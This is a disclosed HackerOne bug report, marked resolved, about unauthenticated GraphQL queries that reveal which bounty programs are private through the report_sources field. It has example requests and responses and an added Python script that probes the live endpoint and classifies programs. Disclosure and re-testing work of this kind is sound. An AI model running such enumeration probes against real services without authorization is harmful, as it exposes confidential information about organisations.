Unauthorized user can obtain `report_sources` attribute through Team GraphQL object
Medium
Vulnerability Details
**Summary:**
Hi team. And Happy New Year!
**Description:**
If I am not mistaken, this parameter lets us determine which private programs have an external link.
If the parameter is not empty, for example `["HackerOne Platform"]`, then the program is private.
### Steps To Reproduce
Endpoint: https://hackerone.com/graphql (POST, JSON body)

1) `{"query": "query {team(handle:\"████████\"){_id,report_sources}}"}`
   Response: `{"data":{"team":{"_id":"██████████","report_sources":[]}}}` - not a private program
2) `{"query": "query {team(handle:\"███\"){_id,report_sources}}"}`
   Response: `{"data":{"team":{"_id":"█████","report_sources":["HackerOne Platform"]}}}` - `["HackerOne Platform"]` - private program
3) `{"query": "query {team(handle:\"█████████\"){_id,report_sources}}"}`
   Response: `{"data":{"team":{"_id":"█████████","report_sources":["HackerOne Platform"]}}}` - `["HackerOne Platform"]` - private program
4) `{"query": "query {team(handle:\"█████\"){_id,report_sources}}"}`
   Response: `{"data":{"team":{"_id":"███","report_sources":[]}}}` - not a private program
Sorry, my English is poor.
I hope you understand me.
Thank you, haxta4ok00
## Impact
Disclosure of private programs that have an external link.
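The probe below is an added example, not code from the report or from HackerOne. It sends the same unauthenticated `team(handle:...){_id,report_sources}` query against the endpoint named in the report and applies the reporter's reading of the result (empty list means public, non-empty means private), while treating GraphQL errors and null results as "no answer" rather than as either verdict, which is what you want when re-testing after a fix. The handles, ids and error message in `SAMPLE_RESPONSES` are constructed to mirror the four responses in the report; the allowed-character set for handles is an assumption made so a handle cannot break out of the quoted string in the query.

```python
"""Probe HackerOne team objects for the report_sources field (added example)."""
import json
import re
import urllib.request

# Endpoint and query shape are the ones shown in the report.
GRAPHQL_URL = "https://hackerone.com/graphql"

# Assumed handle alphabet: restricting it keeps a handle from closing the
# quoted string in the query and injecting extra selections.
HANDLE_RE = re.compile(r"[A-Za-z0-9_-]+")


def query_text(handle: str) -> str:
    """Return the GraphQL query from the report for the given team handle."""
    if not HANDLE_RE.fullmatch(handle):
        raise ValueError(f"refusing to interpolate handle {handle!r}")
    return 'query {team(handle:"%s"){_id,report_sources}}' % handle


def build_body(handle: str) -> bytes:
    """JSON request body; json.dumps escapes the inner quotes for us."""
    return json.dumps({"query": query_text(handle)}).encode("utf-8")


def classify(response: dict) -> str:
    """Apply the report's observation to a parsed GraphQL response.

    Empty report_sources -> "public"; non-empty (the report saw
    ["HackerOne Platform"]) -> "private". Errors or a null team/field mean
    the caller cannot read the attribute, and neither verdict applies.
    """
    if response.get("errors"):
        return "error"      # field denied, unknown, or query rejected
    team = (response.get("data") or {}).get("team")
    if not team or team.get("report_sources") is None:
        return "unknown"    # no such team, or the field came back null
    return "private" if team["report_sources"] else "public"


def probe(handle: str, timeout: float = 10.0) -> str:
    """Send the query unauthenticated, as the report did (does network I/O)."""
    req = urllib.request.Request(
        GRAPHQL_URL,
        data=build_body(handle),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return classify(json.load(resp))


# Constructed responses mirroring the four in the report; handles, ids and
# the error text are made up (the report's real values are redacted).
SAMPLE_RESPONSES = {
    "team-a": {"data": {"team": {"_id": "1", "report_sources": []}}},
    "team-b": {"data": {"team": {"_id": "2", "report_sources": ["HackerOne Platform"]}}},
    "team-c": {"data": {"team": None}},
    "team-d": {"data": None, "errors": [{"message": "Cannot query field 'report_sources'"}]},
}


def classify_samples() -> dict:
    """Run the classifier over the constructed responses (fully offline)."""
    return {handle: classify(resp) for handle, resp in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    for handle, verdict in classify_samples().items():
        print(f"{handle}: {verdict}")
    # Live check against the real endpoint: print(probe("some-handle"))
```

Because `classify` returns "error" rather than "public" when the server rejects the field, the same script can be used to confirm the fix: once unauthenticated callers are denied `report_sources`, every handle should come back as "error" or "unknown", never "private".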
Report Stats
- Report ID: 770209
- State: Closed
- Substate: resolved
- Upvotes: 137